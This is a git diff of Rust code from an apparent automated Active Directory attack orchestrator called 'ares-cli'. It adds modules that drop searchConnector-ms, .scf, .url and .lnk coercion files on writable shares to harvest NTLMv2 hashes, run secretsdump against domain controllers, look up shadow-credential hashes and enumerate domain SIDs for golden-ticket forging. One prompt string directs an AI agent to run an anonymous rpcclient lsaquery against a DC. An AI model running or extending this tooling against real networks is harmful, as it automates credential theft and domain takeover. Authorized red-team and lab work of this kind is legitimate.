.and_then(|h| { + h.hostname + .find('.') + .map(|i| h.hostname[i + 1..].to_lowercase()) + }) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(SearchConnectorWork { + dedup_key, + share_host: share.host.clone(), + share_name: share.name.clone(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Drops .searchConnector-ms coercion files on writable shares. +/// Interval: 45s. +pub async fn auto_searchconnector_coercion( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("searchconnector_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_searchconnector_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "searchconnector_coercion", + "target_ip": item.share_host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("searchconnector_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.share_host, + share = %item.share_name, + "searchConnector-ms coercion file dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SEARCHCONNECTOR, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SEARCHCONNECTOR, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.share_host, "searchConnector coercion deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.share_host, "Failed to dispatch searchConnector coercion"); + } + } + } + } +} + +struct SearchConnectorWork { + dedup_key: String, + share_host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + fn make_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("searchconn:{}:{}", "192.168.58.22", "Public"); + assert_eq!(key, "searchconn:192.168.58.22:Public"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SEARCHCONNECTOR, "searchconnector"); + } + + #[test] + fn writable_share_detection() { + let write_perms = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &write_perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable" + ); + } + } + + #[test] + fn readonly_share_rejected() { + let perm = "READ"; + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_host_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "searchconnector_coercion", + "target_ip": "192.168.58.22", + "share_name": "Public", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "searchconnector_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Public"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn writable_share_full_permission() { + let perm = "FULL"; + // FULL does not contain WRITE, so it should NOT be detected + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_fqdn_with_subdomain() { + let hostname = "web01.sub.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "sub.contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn dedup_key_special_characters_in_share_name() { + let key = format!("searchconn:{}:{}", "192.168.58.10", "Share With Spaces"); + assert_eq!(key, "searchconn:192.168.58.10:Share With Spaces"); + + let key2 = format!("searchconn:{}:{}", "192.168.58.10", "data$"); + assert_eq!(key2, "searchconn:192.168.58.10:data$"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "svc_admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = SearchConnectorWork { + dedup_key: "searchconn:192.168.58.22:Public".into(), + share_host: "192.168.58.22".into(), + share_name: "Public".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work.share_host, "192.168.58.22"); + assert_eq!(work.share_name, "Public"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "svc_admin"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn case_insensitive_permission_matching() { + let perms = ["write", "Write", "WRITE", "read/Write", "Read/WRITE"]; + for p in &perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable regardless of case" + ); + } + } + + // --- collect_searchconnector_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_shares_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Public"); + assert_eq!(work[0].dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "READ")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state.mark_processed( + DEDUP_SEARCHCONNECTOR, + "searchconn:192.168.58.22:Public".into(), + ); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_domain_matched_credential() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_no_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + // No host entry for this share IP, so domain is empty -> falls back to first cred + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_shares_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let names: Vec<&str> = work.iter().map(|w| w.share_name.as_str()).collect(); + assert!(names.contains(&"Public")); + assert!(names.contains(&"Data")); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + } +} diff --git a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs index 005da2b5..27d84f9c 100644 --- a/ares-cli/src/orchestrator/automation/secretsdump.rs +++ b/ares-cli/src/orchestrator/automation/secretsdump.rs @@ -84,7 +84,7 @@ pub async fn auto_local_admin_secretsdump( let mut items = Vec::new(); for cred in &creds { - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_valid_secretsdump_target(dc_domain, &cred.domain) { let dedup = secretsdump_dedup_key(dc_ip, &cred.domain, &cred.username); if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { @@ -135,7 +135,7 @@ pub async fn auto_local_admin_secretsdump( for dominated in &state.dominated_domains { let dom = dominated.to_lowercase(); // Find parent domain DCs: domains where the child ends with ".{parent}" - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_child_of(&dom, dc_domain) { // Find Administrator NTLM hash from the dominated child domain if let Some(hash) = state.hashes.iter().find(|h| { diff --git a/ares-cli/src/orchestrator/automation/shadow_credentials.rs b/ares-cli/src/orchestrator/automation/shadow_credentials.rs index 4d8759ec..f3bcdc3e 100644 --- a/ares-cli/src/orchestrator/automation/shadow_credentials.rs +++ b/ares-cli/src/orchestrator/automation/shadow_credentials.rs @@ -82,29 +82,14 @@ pub async fn auto_shadow_credentials( .unwrap_or("") .to_string(); - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - - // Also check for NTLM hash as fallback + // Find credential for the source user. The source user's + // own domain may differ from the vuln's target `domain` + // (cross-forest ACL edges like petyer.baelish@sk → + // jorah.mormont@essos), so we cannot domain-restrict the + // lookup against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; diff --git a/ares-cli/src/orchestrator/automation/share_coercion.rs b/ares-cli/src/orchestrator/automation/share_coercion.rs new file mode 100644 index 00000000..be68f281 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/share_coercion.rs @@ -0,0 +1,515 @@ +//! auto_share_coercion -- drop coercion files (.scf, .url, .lnk) on writable +//! shares to capture NTLMv2 hashes via Responder/ntlmrelayx. +//! +//! When a user browses to a share containing one of these files, Windows +//! automatically connects back to the attacker-controlled listener, leaking the +//! user's NTLMv2 hash. This is a passive credential harvesting technique. +//! +//! Requires: writable shares discovered by share_enum, a listener IP for the +//! UNC path in the coercion file, and Responder running on the listener. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect share coercion work items from current state. +/// +/// Pure logic extracted from `auto_share_coercion` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. Returns at most 3 items +/// per call to avoid flooding the dispatcher. +fn collect_share_coercion_work(state: &StateInner, listener: &str) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => return Vec::new(), + }; + + state + .shares + .iter() + .filter(|s| { + let perms = s.permissions.to_uppercase(); + perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE") + }) + .filter(|s| { + // Skip default admin/system shares + let name_upper = s.name.to_uppercase(); + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ) + }) + .filter(|s| { + let dedup_key = format!("{}:{}", s.host, s.name); + !state.is_processed(DEDUP_WRITABLE_SHARES, &dedup_key) + }) + .map(|s| ShareCoercionWork { + host: s.host.clone(), + share_name: s.name.clone(), + listener: listener.to_string(), + credential: cred.clone(), + }) + .take(3) // limit per cycle to avoid flooding + .collect() +} + +/// Monitors for writable shares and dispatches coercion file drops. +/// Interval: 45s. +pub async fn auto_share_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("share_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, // need listener for UNC path in coercion files + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_share_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "share_coercion", + "target_ip": item.host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("share_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host, + share = %item.share_name, + "Share coercion file drop dispatched" + ); + + let dedup_key = format!("{}:{}", item.host, item.share_name); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WRITABLE_SHARES, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WRITABLE_SHARES, &dedup_key) + .await; + } + Ok(None) => { + debug!( + host = %item.host, + share = %item.share_name, + "Share coercion task deferred by throttler" + ); + } + Err(e) => { + warn!( + err = %e, + host = %item.host, + share = %item.share_name, + "Failed to dispatch share coercion" + ); + } + } + } + } +} + +struct ShareCoercionWork { + host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + #[test] + fn dedup_key_format() { + let key = format!("{}:{}", "192.168.58.22", "Users"); + assert_eq!(key, "192.168.58.22:Users"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WRITABLE_SHARES, "writable_shares"); + } + + #[test] + fn admin_shares_filtered() { + let admin_shares = ["C$", "ADMIN$", "IPC$", "PRINT$", "SYSVOL", "NETLOGON"]; + for name in &admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered" + ); + } + } + + #[test] + fn non_admin_shares_pass() { + let user_shares = ["Users", "Public", "Data", "shared"]; + for name in &user_shares { + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should pass through" + ); + } + } + + #[test] + fn writable_permission_matching() { + let writable = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &writable { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(is_writable, "{p} should be writable"); + } + } + + #[test] + fn readonly_permission_rejected() { + let readonly = ["READ", "NONE", "DENIED"]; + for p in &readonly { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "{p} should NOT be writable"); + } + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "share_coercion", + "target_ip": "192.168.58.22", + "share_name": "Users", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "share_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Users"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn admin_share_filtering_lowercase_variations() { + let lower_admin_shares = ["c$", "admin$", "ipc$", "print$", "sysvol", "netlogon"]; + for name in &lower_admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} (lowercase) should be filtered after uppercasing" + ); + } + } + + #[test] + fn writable_permission_with_change_keyword() { + let perm = "CHANGE"; + let perms = perm.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "CHANGE alone should not match WRITE logic"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = ShareCoercionWork { + host: "192.168.58.22".into(), + share_name: "Data".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.host, "192.168.58.22"); + assert_eq!(work.share_name, "Data"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn per_cycle_limit_of_three() { + let shares: Vec = (0..10).map(|i| format!("Share{i}")).collect(); + let limited: Vec<&String> = shares.iter().take(3).collect(); + assert_eq!(limited.len(), 3); + assert_eq!(*limited[0], "Share0"); + assert_eq!(*limited[2], "Share2"); + } + + #[test] + fn empty_share_name_handling() { + let name = ""; + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "Empty share name should pass admin filter" + ); + } + + #[test] + fn case_insensitive_admin_share_check() { + let mixed_case = ["Sysvol", "NetLogon", "Admin$", "Ipc$"]; + for name in &mixed_case { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered regardless of case" + ); + } + } + + // --- collect_share_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_shares_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Users"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "READ")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_admin_shares_filtered() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "ADMIN$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "C$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "IPC$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "SYSVOL", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "NETLOGON", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + state.mark_processed(DEDUP_WRITABLE_SHARES, "192.168.58.22:Users".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_limits_to_three_per_cycle() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + for i in 0..5 { + state + .shares + .push(make_share("192.168.58.22", &format!("Share{i}"), "WRITE")); + } + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 3); + } + + #[test] + fn collect_read_write_permission_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_name, "Data"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + } +} diff --git a/ares-cli/src/orchestrator/automation/sid_enumeration.rs b/ares-cli/src/orchestrator/automation/sid_enumeration.rs new file mode 100644 index 00000000..4cd11565 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/sid_enumeration.rs @@ -0,0 +1,426 @@ +//! auto_sid_enumeration -- enumerate domain SIDs and well-known SID mappings. +//! +//! Queries each discovered DC via LDAP to resolve the domain SID, then maps +//! well-known RIDs (500=Administrator, 502=krbtgt, 512=Domain Admins, etc.) +//! to confirm account names. This is useful when the RID-500 account has +//! been renamed (e.g., not "Administrator"). +//! +//! Also discovers the domain SID needed for golden ticket forging and +//! ExtraSid attacks. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SID enumeration work items from current state. +/// +/// Pure logic extracted from `auto_sid_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_sid_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip if we already have the SID for this domain + if state.domain_sids.contains_key(domain) { + continue; + } + + let dedup_key = format!("sid_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_SID_ENUMERATION, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(SidEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Enumerate domain SIDs and well-known accounts. +/// Interval: 45s. +pub async fn auto_sid_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("sid_enumeration") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_sid_enum_work(&state) + }; + + for item in work { + // Cross-forest authenticated RPC/LDAP from the source forest's + // credential typically returns ACCESS_DENIED — but `rpcclient + // -U "" -N -c lsaquery` over a null session usually succeeds + // against DCs that allow anonymous LSA queries (most legacy + // configurations). The agent loop won't try the null-session + // path on its own when handed a credential, so we explicitly + // instruct it to fall through. The result-processor's + // `extract_lsaquery_domain_sid` regex captures the resulting + // `Domain Name: / Domain Sid:` block and caches it against the + // domain, which unblocks `forge_inter_realm_and_dump`. + let cred_is_cross_forest = !item + .credential + .domain + .to_lowercase() + .ends_with(&item.domain.to_lowercase()) + && !item + .domain + .to_lowercase() + .ends_with(&item.credential.domain.to_lowercase()) + && item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let instructions = if cred_is_cross_forest { + Some(format!( + "Resolve the domain SID and RID-500 account name for {dom} ({dc}). \ + The provided credential is from a different forest and authenticated \ + RPC/LDAP from outside this forest typically fails with ACCESS_DENIED. \ + Run `rpcclient -U \"\" -N {dc} -c \"lsaquery\"` first (null/anonymous \ + session — no credential needed) to capture the `Domain Name:` and \ + `Domain Sid:` lines. Then run `impacket-lookupsid` with the provided \ + credential as a secondary attempt for RID-500 mapping. Report both \ + outputs verbatim via task_complete tool_outputs so the parser can \ + extract the SID.", + dom = item.domain, + dc = item.dc_ip, + )) + } else { + None + }; + + let mut payload = json!({ + "technique": "sid_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + if let Some(text) = instructions { + payload["instructions"] = json!(text); + } 